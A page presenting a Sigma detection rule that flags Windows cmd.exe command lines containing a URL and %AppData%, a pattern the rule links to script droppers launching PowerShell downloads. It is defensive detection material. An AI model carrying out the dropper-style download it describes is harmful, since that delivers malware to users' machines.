Command Line Execution with Suspicious URL and AppData Strings
Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Sigma rule (View on GitHub)
1title: Command Line Execution with Suspicious URL and AppData Strings
2id: 1ac8666b-046f-4201-8aba-1951aaec03a3
3status: test
4description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
5references:
6 - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100
7 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100
8author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
9date: 2019/01/16
10modified: 2021/11/27
11tags:
12 - attack.execution
13 - attack.command_and_control
14 - attack.t1059.003
15 - attack.t1059.001
16 - attack.t1105
17logsource:
18 category: process_creation
19 product: windows
20detection:
21 selection:
22 Image|endswith: '\cmd.exe'
23 CommandLine|contains|all:
24 - 'http' # captures both http and https
25 - '://'
26 - '%AppData%'
27 condition: selection
28fields:
29 - CommandLine
30 - ParentCommandLine
31falsepositives:
32 - High
33level: medium
References
-
Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.
Read More -
Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. Hybrid Analysis develops and licenses analysis tools to fight malware.
Read More
Related rules
- PowerShell DownloadFile
- File Was Not Allowed To Run
- Detection of PowerShell Execution via Sqlps.exe
- Invoke-Obfuscation Obfuscated IEX Invocation
- Remote PowerShell Session Host Process (WinRM)